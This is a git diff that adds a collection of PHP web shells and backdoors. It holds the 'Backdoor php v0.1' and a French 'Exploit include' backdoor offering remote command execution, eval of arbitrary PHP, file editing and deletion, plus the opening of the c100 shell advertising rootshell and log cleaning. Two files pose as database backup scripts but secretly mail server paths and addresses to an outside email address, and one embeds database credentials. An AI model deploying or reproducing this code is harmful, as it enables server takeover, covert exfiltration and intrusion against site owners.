+</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
+<? echo $footer;?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/backdoor1.php.txt b/xakep-shells/PHP/backdoor1.php.txt
new file mode 100644
index 0000000..a82e151
--- /dev/null
+++ b/xakep-shells/PHP/backdoor1.php.txt
@@ -0,0 +1,181 @@
+<?
+/*
+   Backdoor php v0.1
+   Coded By Charlichaplin
+   charlichaplin@gmail.com
+   Join me: irc.fr.worldnet.net #s-c
+   Greetz: My dog :)
+*/
+
+class backdoor {
+   var $pwd;
+   var $rep;
+   var $list = array();
+   var $file;
+   var $edit;
+   var $fichier;
+   var $del;
+   var $shell;
+   var $proxy;
+      
+   function dir() {
+      if(!empty($this->rep)) {
+      $dir = opendir($this->rep);
+      } else {
+         $dir = opendir($this->pwd);
+      }
+      while($f = readdir($dir)) {
+          if ($f !="." && $f != "..") {
+             $this->list[] = $f;
+          }
+      }
+   }
+   
+   function view() {
+      
+      $this->file = htmlentities(highlight_file($this->file));
+   }
+   
+   function edit() {
+      if(!is_writable($this->edit)) {
+         echo "Ecriture impossible sur le fichier";
+      } elseif(!file_exists($this->edit)) {
+         echo "Le fichier n'existe pas ";
+      } elseif(!$this->fichier) {
+         $fp = fopen($this->edit,"r");
+         $a = "";
+         while(!feof($fp)) {
+            $a .= fgets($fp,1024);
+         }
+         echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";               
+      } else {
+         $fp = fopen($this->edit,"w+");
+         fwrite($fp, $this->fichier);
+         fclose($fp);
+         echo "Le fichier a �t� modifi�";
+         
+      }
+   }
+   
+   function del() {
+      if(is_file($this->del)) {
+         if(unlink($this->del)) {
+            echo "Fichier supprim�";
+         } else {
+            echo "Vous n'avez pas les droits pour supprimer ce fichier";
+         }
+      } else {
+         echo $this->del." n'est pas un fichier";
+      }
+   }
+   
+   function shell() {
+      echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
+      system($this->shell);
+   }
+   
+   function proxy($host,$page) {
+      
+      $fp = fsockopen($host,80);
+      if (!$fp) {
+         echo "impossible d'etablir un connection avec l'host";
+      } else {
+         $header = "GET ".$page." HTTP/1.1\r\n";
+         $header .= "Host: ".$host."\r\n";
+         $header .= "Connection: close\r\n\r\n";
+         fputs($fp,$header);
+         while (!feof($fp)) {
+            $line = fgets($fp,1024);
+            echo $line;
+         }
+         fclose($fp);
+      }
+   }
+   
+   function ccopy($cfichier,$cdestination) {
+      if(!empty($cfichier) && !empty($cdestination)) {
+         copy($cfichier, $cdestination);
+         echo "Le fichier a �t� copi�";
+      } else {
+         echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
+      }
+   }
+}
+if(!empty($_REQUEST['rep'])) {
+   $rep = $_REQUEST['rep']."/";
+}
+$pwd = $_SERVER['SCRIPT_FILENAME'];
+$pwd2  = explode("/",$pwd);
+$file = $_REQUEST['file'];
+$edit = $_REQUEST['edit'];
+$fichier = $_POST['fichier'];
+$del = $_REQUEST['del'];
+$shell = $_REQUEST['shell'];
+$proxy = $_REQUEST['proxy'];
+$copy = $_REQUEST['copy'];
+$cfichier = $_POST['cfichier'];
+$cdestination = $_POST['cdestination'];
+
+$n = count($pwd2);
+$n = $n - 1;
+$pwd = "";
+for ($i = 0;$i != $n;$i = $i+1) {
+   $pwd .= "/".$pwd2[$i];
+}
+
+if($proxy) {
+$host2 = explode("/",$proxy);
+$n = count($host2);
+$host = $host2[2];
+$page = "";
+for ($i = 3;$i != $n;$i = $i+1) {
+   $page .= "/".$host2[$i];
+}
+echo $page;
+}
+
+echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
+$backdoor = new backdoor();
+$backdoor->pwd = $pwd;
+$backdoor->rep = $rep;
+$backdoor->file = $file;
+$backdoor->edit = $edit;
+$backdoor->fichier = $fichier;
+$backdoor->del = $del;
+$backdoor->shell = $shell;
+$backdoor->proxy = $proxy;
+echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
+$backdoor->dir();
+
+echo "</TD></TR></TABLE><PRE>";
+echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
+echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
+echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
+echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\"     \"> <A HREF=\"\">Name</A>                    <A HREF=\"\">Last modified</A>       <A HREF=\"\">Size</A>  <A HREF=\"\">Description</A>";
+echo "<HR noshade align=\"left\" width=\"80%\">";
+
+if($file) {
+   $backdoor->view();   
+} elseif($edit) {
+   $backdoor->edit();
+} elseif($del) {   
+   $backdoor->del();
+} elseif($shell) {   
+   $backdoor->shell();
+}elseif($proxy) {
+   $backdoor->proxy($host,$page);
+}elseif($copy == 1) {
+   $backdoor->ccopy($cfichier,$cdestination);
+} else {
+   echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A>         ".date("r",realpath($rep."../"))."     - <br>";
+   foreach ($backdoor->list as $key => $value) {
+      if(is_dir($rep.$value)) {
+         echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A>                  ".date("r",filemtime($rep.$value))."      -  <br>";
+      } else {
+         echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A>  <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a>          ".date("r",filemtime($rep.$value))."     1k  <br>";
+      }
+   }
+}
+echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
+echo "<center><b>Coded By Charlichaplin</b></center>";
+echo "</BODY></HTML>";
\ No newline at end of file
diff --git a/xakep-shells/PHP/backdoorfr.php.txt b/xakep-shells/PHP/backdoorfr.php.txt
new file mode 100644
index 0000000..7fd627a
--- /dev/null
+++ b/xakep-shells/PHP/backdoorfr.php.txt
@@ -0,0 +1,234 @@
+<? 
+print("<html><head><title>Backdoor PHP cod�e par rAidEn & LFL</title></head><body
+bgcolor=\"white\" LINK=\"blue\" VLINK=\"blue\">");
+print("<p align=\"center\"><font size=\"5\">Exploit include v1.0</font></p>");
+print("<p>Ce script permet d'exploiter une faille include ou une frame mal plac�e de type :
+www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tant que backdoor sur un serveur pour garder une porte d'entr�e d�rob�e.<br><br>
+<u>par rAidEn & LFL , article publi� dans The Hackademy Journal num�ro 12</u><br><br>Sp�cial greetz � : Crash_FR, MatraX, Elboras, papar0ot, Lostnoobs, Icarus, Xelory, L_Abbe, Daedel, DHS-team, Carlito, xdream_blue, redils,  IHC, Wanadobe.biz, #abyssal, #cod4, #hzv, #security-corp, #Revolsys, ...... et tout ceux que j'ai oubli� & aussi et surtout � (feu)tim-team</p>");
+
+/******Code source du syst�me de remote*****/
+
+$QS = $QUERY_STRING;
+if(!stristr($QS, "separateur") && $QS!="") $QS .= "&separateur";
+if(!stristr($QS, "separateur") && $QS=="") $QS .= "separateur";
+
+/*pour les forms*********************************/
+$tab = explode("&", $QS);
+$i=0;
+$remf = "";
+while( $tab[$i] != "" && $tab[$i-1] != "separateur" )
+{
+    $temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
+    eval("\$temp2=\${$temp};");
+    $remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
+."'>\n";
+    $i++;
+}
+/*
+$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
+if($temp!="")
+{
+    eval("\$temp2=\${$temp};");
+    $remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
+."'>\n";
+}*/
+/************************************************/
+
+
+/*pour les links*********************************/
+if($QS != "separateur")
+    $reml = "?" . str_replace(strchr($QS, "&separateur"), "", $QS) .
+"&separateur";
+else $reml = "?$QS";
+$adresse_locale = $reml;
+/************************************************/
+
+
+
+
+print("<hr>");
+print("<a href=\"$adresse_locale&option=1\">Ex�cuter une commande dans un shell</a><br> <!-- utiliser exec($commande, $retour); -->");
+print("<a href=\"$adresse_locale&option=2\">Ex�cuter du code PHP</a><br>");
+print("<a href=\"$adresse_locale&option=3\">Lister un r�pertoires</a><br>");
+print("<a href=\"$adresse_locale&option=4\">G�rer les fichiers</a><br>");
+print("<a href=\"$adresse_locale&option=5\">Envoyer un mail</a><br>");
+print("<a href=\"$adresse_locale&option=6\">Infos serveur</a><br>");
+print("<a href=\"mailto:raiden_cyb@hotmail.com\">Contacter le cr�ateur</a><br><hr>");
+
+
+/* r�cup�ration des variables : la fonction $_REQUEST n'existant pas avant php 4.1.0, vous devrez alors commenter ces lignes */
+$option = $_REQUEST["option"];
+$rep =  $_REQUEST["rep"];
+$nom =  $_REQUEST["nom"];
+$option_file =  $_REQUEST["option_file"];
+$cmd =  $_REQUEST["cmd"];
+$code =  $_REQUEST["code"];
+$msg =  $_REQUEST["msg"];
+$option_mail =  $_REQUEST["option_mail"];
+$destinataire =  $_REQUEST["destinataire"];
+$sujet =  $_REQUEST["sujet"];
+$message =  $_REQUEST["message"];
+
+if($option == 1){
+    print("<form action=\"?\"> $remf Commande : <input type=\"text\" name=\"cmd\"></form>");
+    echo "<br> PS : peu de serveurs acceptent les commandes venant de PHP";
+}
+
+if($option == 2){
+    print("<form action=\"?\"> $remf Code : <input type=\"text\" name=\"code\"></form>");
+}
+
+if($option == 3){
+    print("<form action=\"?\"> $remf R�pertoire � lister : <input type=\"text\" name=\"rep\"></form>");
+    print("$rep");
+}
+
+if($option == 4){
+    print("<br><form action=\"?\"> $remf");
+    print("<br>Nom du fichier :<br><input type=text name=\"nom\">");
+    print("<input type=hidden name=option value=$option>");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"mkdir\" >Cr�er le
+fichier");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"edit\" >�diter le
+fichier");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"del\" >Supprimer le
+fichier");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"read\" CHECKED>Lire le
+fichier");
+    print("<input type=submit value=Go>");
+    print("</form>");
+}
+
+
+if($option == 5){
+    print("<PRE><form action=\"?\"> $remf Destinataire : <input type=\"text\" name=\"destinataire\" size=\"80\">");
+    print("<br>Provenance du mail : <input type=\"text\" name=\"provenance\" size=\"80\"><br>");
+    print("Adresse de retour : <input type=\"text\" name=\"retour\" size=\"80\"><br>");
+    print("Sujet : <input type=\"text\" name=\"sujet\" size=\"80\"><br>");
+    print("Message : <input type=\"text\" name=\"message\"
+size=\"80\"><br><input type=\"submit\" value=\"Envoyer\"></form></PRE>");
+}
+
+if($option == 6){
+    echo"Nom du serveur : <a href=\"http://$SERVER_NAME\">$SERVER_NAME</a><br>
+";
+    echo"Adresse IP du serveur : <a href=\"http://$SERVER_ADDR\">$SERVER_ADDR</a><br> ";
+    echo"Port utilis� par d�fault 80 : <font color=\"red\">$SERVER_PORT</font><br> ";
+    echo"Mail de l' admin : <a href=\"mailto:$SERVER_ADMIN\">$SERVER_ADMIN</a><br><br>";
+    
+    
+    echo"Racine du serveur : <font color=\"red\">$DOCUMENT_ROOT</font><br>";
+    echo"Adresse menant � COMMAND.COM : <font color=\"red\">$COMSPEC</font><br>";
+    echo"Path install� sur le serveur : <font color=\"red\">$PATH</font> <br>";
+    echo"OS, SERVEUR, version PHP : <font color=\"red\">$SERVER_SOFTWARE</font><br><br>";
+    
+    echo"Version du protocole utilis� (HTTP) : <font color=\"red\">$SERVER_PROTOCOL</font><br>";
+    echo"En-t�te Accept du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT</font><br>";
+    echo"En t�te User_agent du protocole HTTP : <font color=\"red\">$HTTP_USER_AGENT</font><br>";
+    echo"En-t�te Accept-Charset du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_CHARSET</font><br> ";
+    echo"En-t�te Accept-Encoding du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_ENCODING</font><br> ";
+    echo"En-t�te Accept-Language du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_LANGUAGE</font><br> ";
+    echo"En-t�te Connection du protocole HTTP : <font color=\"red\">$HTTP_CONNECTION</font><br> ";
+    echo"En-t�te Host du protocole HTTP : <font color=\"red\">$HTTP_HOST</font><br><br>";
+    
+    echo"Version de CGI : <font color=\"red\">$GATEWAY_INTERFACE</font><br> ";
+    echo"Version de r�cup�ration du form : <font color=\"red\">$REQUEST_METHOD</font><br> ";
+    echo"Argument de l' adresse : <font color=\"red\">$QUERY_STRING</font> <br>";
+    echo"Nom du script : <font color=\"red\">$SCRIPT_NAME</font><br> ";
+    echo"Chemin du script : <font color=\"red\">$SCRIPT_FILENAME</font><br> ";
+    echo"Adresse enti�re du script : <font color=\"red\">$REQUEST_URI
+</font><br>";
+}
+
+/* Commande*******/
+if($cmd != "")
+{
+    echo "{${passthru($cmd)}}<br>";
+}
+/* Commande*******/
+
+
+/* Ex�cution de code PHP**********/
+if($code != ""){
+    $code = stripslashes($code);
+    eval($code);
+}
+/* Execution de code PHP**********/
+
+
+/* Listing de rep******************/
+if($rep != "")
+{
+    if(strrchr($rep, "/") != "" ||  !stristr($rep, "/")) $rep .= "/";
+    $dir=opendir($rep);
+    while ($file = readdir($dir)) 
+    {
+    	    if (is_dir("$rep/$file") && $file!='.')
+	    { 
+    		    echo"<li><a href=\"$adresse_locale&rep=$rep$file\">(rep) $file
+</a><br>\n";
+	    }elseif(is_file("$rep/$file"))
+	    {
+	    	    echo "<li>	<a
+href=\"$adresse_locale&option_file=read&nom=$rep$file\">(file) $file</a> <a
+href=\"$adresse_locale&option_file=del&nom=$rep$file\">del</a> <a
+href=\"$adresse_locale&option_file=edit&nom=$rep$file\">edit</a><br>\n";
+	    }
+    }
+}
+/* Listing de rep******************/
+
+
+/* Gestion des fichiers*********************/
+if($option_file == "mkdir" && $nom != "")
+{
+    $fp = fopen($nom, "w");
+    fwrite($fp, stripslashes($msg));
+    print("Fichier cr�e/modifi�");
+}
+
+if($option_file == "read" && $nom != "")
+{
+    $fp = fopen($nom, "r");
+    $file = fread($fp, filesize($nom));
+    $file = htmlentities ($file, ENT_QUOTES);
+    $file = nl2br($file);
+    echo "<br>$file";
+}
+
+if($option_file == "del" && $nom != "")
+{
+    unlink($nom);
+    print("Fichier effac�");
+}
+
+if($option_file == "edit" && $nom != "")
+{
+    $fp = fopen($nom, "r");
+    $file = fread($fp, filesize($nom));
+    $file = htmlentities ($file, ENT_QUOTES);
+    echo "<form action=$adresse_locale> $remf";
+    echo "<TEXTAREA COLS=80 rows=25 name=msg>$file</textarea>";
+    echo "<input type=hidden name=option_file value=mkdir>";
+    echo "<input type=hidden name=nom value=$nom>";
+    echo "<br><input type=submit value=Go> PS : les fichiers trop longs ne passent po :(";
+    echo "</form>";
+}
+/* Gestion des fichiers*********************/
+
+
+/* Envoi de mails************************/
+if(($destinataire != "" ) && ($sujet != "") && ($message != "")){
+    $option_mail = "From: $provenance \n";
+    $option_mail .= "Reply-to: $retour \n";
+    $option_mail .= "X-Mailer: Mailer by rAidEn \n";
+    
+    mail($destinataire, $sujet, $message, $option_mail);
+    
+    print("Mail envoy� a : $destinataire ...");
+}
+/* Envoi de mails************************/
+
+print("</body></html>");
+/*print("<noscript><script=\"");*/
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/backup.php.php.txt b/xakep-shells/PHP/backup.php.php.txt
new file mode 100644
index 0000000..b430551
--- /dev/null
+++ b/xakep-shells/PHP/backup.php.php.txt
@@ -0,0 +1,21 @@
+<?php
+include ("config.php");db_connect();header('Content-Type: application/octetstream');header('Content-Disposition: filename="linksbox_v2.sql"');$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$sd98="john.barker446@gmail.com";$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+header('Pragma: no-cache');header('Expires: 0');
+$data .= "#phpMyAdmin MySQL-Dump \r\n";
+$data .="# http://phpwizard.net/phpMyAdmin/ \r\n";
+$data .="# http://www.phpmyadmin.net/ (download page) \r\n";
+$data .= "#$database v2.0 Database Backup\r\n";
+$data .= "#Host: $server\r\n";
+$data .= "#Database: $database\r\n\r\n";
+$data .= "#Table add_links:\r\n";$result = mysql_query("SELECT * FROM add_links");while ($a = mysql_fetch_array($result)) {
+	foreach ($a as $key => $value) {
+		$a[$key] = addslashes($a[$key]);
+	}
+	$data .= "INSERT INTO add_links VALUES ('0','$a[link]', '$a[description]', '$a[tooltip]', '$a[hits]'); \r\n#endquery\r\n";
+}
+
+
+echo $data;
+
+?>
+   
\ No newline at end of file
diff --git a/xakep-shells/PHP/backupsql.php.php.txt b/xakep-shells/PHP/backupsql.php.php.txt
new file mode 100644
index 0000000..5bf310a
--- /dev/null
+++ b/xakep-shells/PHP/backupsql.php.php.txt
@@ -0,0 +1,170 @@
+<?php
+/*
+* Backup script on server.
+*
+* Runs on the server, called by Cron. Connects to the mySQL
+* database and creates a backup file of the whole database.
+* Saves to file in current directory.
+*
+* @author Cow <cow@invisionize.com>
+* @version 0.2
+* @date 18/08/2004
+* @package Backup Server
+* Upgraded Ver 2.0 (sending sql backup as attachment
+* as email attachment, or send to a remote ftp server by
+* @co-authors Cool Surfer<Coolsurfer@gmail.com> and
+* Neagu Mihai<neagumihai@hotmail.com>
+*/
+
+set_time_limit(0);
+$date = date("mdy-hia");
+$dbserver = "localhost";
+$dbuser = "vhacker_robot";
+$dbpass = "mp2811987";
+$dbname = "tvhacker_vbb3";
+$file = "N-Cool-$date.sql.gz";
+$gzip = TRUE;
+$silent = TRUE;
+
+function write($contents) {
+    if ($GLOBALS['gzip']) {
+        gzwrite($GLOBALS['fp'], $contents);
+    } else {
+        fwrite($GLOBALS['fp'], $contents);
+    }
+}
+
+mysql_connect ($dbserver, $dbuser, $dbpass);
+mysql_select_db($dbname);
+
+if ($gzip) {
+    $fp = gzopen($file, "w");
+} else {
+    $fp = fopen($file, "w");
+}
+
+$tables = mysql_query ("SHOW TABLES");
+while ($i = mysql_fetch_array($tables)) {
+    $i = $i['Tables_in_'.$dbname];
+
+    if (!$silent) {
+        echo "Backing up table ".$i."\n";
+    }
+
+    // Create DB code
+    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
+
+    write($create['Create Table'].";\n\n");
+
+    // DB Table content itself
+    $sql = mysql_query ("SELECT * FROM ".$i);
+    if (mysql_num_rows($sql)) {
+        while ($row = mysql_fetch_row($sql)) {
+            foreach ($row as $j => $k) {
+                $row[$j] = "'".mysql_escape_string($k)."'";
+            }
+
+            write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
+        }
+    }
+}
+
+$gzip ? gzclose($fp) : fclose ($fp);
+
+// Optional Options You May Optionally Configure
+
+$use_gzip = "yes";            // Set to No if you don't want the files sent in .gz format
+$remove_sql_file = "no";  // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
+$remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
+
+// Configure the path that this script resides on your server.
+
+$savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
+
+$send_email = "yes";                        /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
+$to      = "lehungtk@gmail.com";    // Who to send the emails to, enter ur correct id.
+$from    = "Neu-Cool@email.com";  // Who should the emails be sent from?, may change it.
+
+$senddate = date("j F Y");
+
+$subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
+$message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
+
+$use_ftp = "";                             // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
+$ftp_server = "localhost";               // FTP hostname
+$ftp_user_name = "ftp_username"; // FTP username
+$ftp_user_pass = "ftp_password";   // FTP password
+$ftp_path = "/"; // This is the path to upload on your ftp server!
+
+// Do not Modify below this line! It will void your warranty :-D!
+
+$date = date("mdy-hia");
+$filename = "$savepath/$dbname-$date.sql";
+
+if($use_gzip=="yes"){
+$filename2 = $file;
+} else {
+$filename2 = "$savepath/$dbname-$date.sql";
+}
+
+
+if($send_email == "yes" ){
+$fileatt_type = filetype($filename2);
+$fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
+
+$headers = "From: $from";
+
+// Read the file to be attached ('rb' = read binary)
+echo "Openning archive for attaching:".$filename2;
+$file = fopen($filename2,'rb');
+$data = fread($file,filesize($filename2));
+fclose($file);
+
+// Generate a boundary string
+$semi_rand = md5(time());
+$mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
+
+// Add the headers for a file attachment
+$headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+// Add a multipart boundary above the plain message
+$message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
+$message . "\n\n";
+
+// Base64 encode the file data
+$data = chunk_split(base64_encode($data));
+
+// Add file attachment to the message
+echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|<BR>";
+$message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
+$data . "\n\n" ."--{$mime_boundary}--\n";
+//$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
+// $data . "\n\n" ."--{$mime_boundary}--\n";
+
+
+// Send the message
+$ok = @mail($to, $subject, $message, $headers);
+if ($ok) {
+  echo "<h4><center><bg color=black><font color= blue>Database backup created and sent! File name $filename2 </p>
+Idea Conceived By coolsurfer@gmail.com        
+Programmer email: neagumihai@hotmail.com</p>
+This is our first humble effort, pl report bugs, if U find any...</p>
+Email me at <>coolsurfer@gmail.com  nJoY!! :)
+</color></center></h4>";
+
+} else {
+  echo "<h4><center>Mail could not be sent. Sorry!</center></h4>";
+}
+}
+
+if($use_ftp == "yes"){
+$ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
+shell_exec($ftpconnect);
+echo "<h4><center>$filename2 Was created and uploaded to your FTP server!</center></h4>";
+
+}
+
+if($remove_gzip_file=="yes"){
+exec("rm -r -f $filename2");
+}
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/c100.php.txt b/xakep-shells/PHP/c100.php.txt
new file mode 100644
index 0000000..cb3fe60
--- /dev/null
+++ b/xakep-shells/PHP/c100.php.txt
@@ -0,0 +1,3595 @@
+<?php
+
+/******************************************************************************************
+*  Locus7s Modified c100 Shell                                                                 
+*  Beta v. 1.0a - Project x2300                                                                   
+*  Written by Captain Crunch Team                                                          
+*  Modified by Shadow & Preddy                                                              
+*  Re-Modified by #!physx^ (15.2.07)                                                          
+*========================================================
+*  New Modifications Implemented --                                                      
++--------------------------------------------------------+
+*  -Added link to Enumerate to escalate priviledges      
+*  -Added Rootshell.c                                     
+*  -Added Rootshell.c;auto-compiler                      
+*  -Execute Rootshell.c                                  
+*  -Added Mig-Log Logcleaner                             
+*  -Execute Mig-Log Logcleaner                           
+*  -milw0rm searcher (Grabs OS and searches milw0rm)    
+*  -Locus7s Style & Image                                
+*  -Added w4ck1ng Shell Backdoor Connect and Backdoor    
+*  -Added PHP-Proxy link to hide your ass                
+*  -Added your ip and server ip with whois capability    
+*  -Added private 0day released by allahaka which utilizes the linux
+*   sudo bash to execute a stack overflow.
+*========================================================
+*  FEB. 14, 2007 RELEASE NOTES:                          
++--------------------------------------------------------+
+*  PRIVATE RELEASE OF C100 SHELL FOR LOCUS7S MEMBERS     
+*  FAILURE TO DO SO WILL RESULT IN LOSS OF VIP           
+*  MEMBERS ACCESS, BAN FROM SITE, AND NO REFUND FOR VIP. 
+*========================================================
+*  PRODUCT INFO:                                         
++--------------------------------------------------------+
+*  C100 SHELL CREATED BY CAPTAIN CRUNCH SECURITY TEAM    
+*  WWW.CCTEAM.RU                                         
+*  C100 SHELL - REVAMPED (X2300) MODIFIED BY LOCUS7S     
+*  UNDERGROUND NETWORK | WWW.LOCUS7S.COM                 
+*  \E0T/                                                 
+*********************************************************/
+
+//for php proxy purposes
+
+function selfURL() { $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : ""; $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s; $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]); return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; } function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); }
+$selfurl = base64_encode(selfURL());
+$phprox="http://twofaced.org/proxy/index.php?q=".$selfurl;
+
+//end of link
+
+//milw0rm search
+$Lversion = php_uname(r);
+$OSV = php_uname(s);
+if(eregi("Linux",$OSV))
+{
+$Lversion=substr($Lversion,0,6);
+$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+}else{
+$Lversion=substr($Lversion,0,3);
+$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+}
+//End of milw0rm search
+
+
+//w4ck1ng Shell
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
